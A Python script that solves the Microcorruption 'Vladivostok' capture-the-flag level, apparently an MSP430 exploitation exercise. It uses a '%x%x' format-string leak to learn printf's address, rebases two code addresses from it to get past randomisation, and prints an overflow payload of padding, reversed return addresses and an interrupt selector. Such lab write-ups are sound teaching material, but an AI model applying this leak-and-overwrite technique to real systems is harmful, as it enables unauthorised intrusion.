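"""
Script to solve https://microcorruption.com/debugger/Vladivostok

- Enter '%x%x' into the username field to get the printf-location
- Input the printf-location into this script (as a hex string)
- Enter the output string into the password field to solve

The script rebases the other two addresses it needs from the printf-location,
using their offsets from printf in the program at its original location.
"""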
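def reverse_byte_order(hex_int):
    """Return the hex digits of *hex_int* with its bytes in reversed order.

    The value is rendered as lowercase hex without the ``0x`` prefix,
    left-padded with one zero when needed so it covers whole bytes, and the
    two-character byte groups are joined last-to-first, so the
    least-significant byte comes first (``0x476a`` -> ``"6a47"``).

    The result is only as wide as the value requires; it is not padded to a
    fixed word size.

    Raises:
        ValueError: if *hex_int* is negative.
    """
    if hex_int < 0:
        raise ValueError("reverse_byte_order expects a non-negative integer")

    # Drop the "0x" prefix before padding. Padding the prefixed string instead
    # misaligns the byte groups for any value with an odd number of hex digits
    # (0xabc would come out as "bcxa" rather than "bc0a").
    digits = hex(hex_int)[2:]
    if len(digits) % 2:
        digits = "0" + digits

    # Walk the two-character groups from the last one to the first.
    return "".join(digits[i:i + 2] for i in range(len(digits) - 2, -1, -2))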
def get_printf_address():
    """Prompt on stdin for a hex string and return it parsed as an integer.

    The text is parsed with ``int(..., 16)``, which raises ``ValueError``
    when the input is not valid base-16.
    """
    return int(input("Enter a hex string: "), 16)
def compute_solution():
    """Build and print the string to enter into the password field.

    Prompts for the leaked printf address, rebases the two other addresses
    by their fixed distance from printf in the program at its original
    location, and prints the assembled hex string.
    """
    # Addresses as they appear when the program sits at its original location.
    PRINTF_ADDR = 0x476a  # The address that can be leaked ('%x%x' per the module docstring)
    INT_ADDR = 0x48ec  # Where a specific value can be pushed to R14
    PUSH_R14_ADDR = 0x4954  # Triggers an interrupt with R14 as the INT selector

    leaked_printf_addr = get_printf_address()

    # The code assumes both targets keep their original distance from printf,
    # so each one is rebased from the leaked address.
    rebased_addrs = [
        leaked_printf_addr + (original - PRINTF_ADDR)
        for original in (INT_ADDR, PUSH_R14_ADDR)
    ]

    pieces = ["aaaaaaaaaaaaaaaa"]  # Initial offset
    for addr in rebased_addrs:
        pieces.append(reverse_byte_order(addr))
    # NOTE(review): presumably the value that ends up in R14 as the INT
    # selector, written low byte first; confirm against the level.
    pieces.append("7f00")

    print("".join(pieces))
# Run the solver only when this file is executed as a script, not on import.
if __name__ == "__main__":
    compute_solution()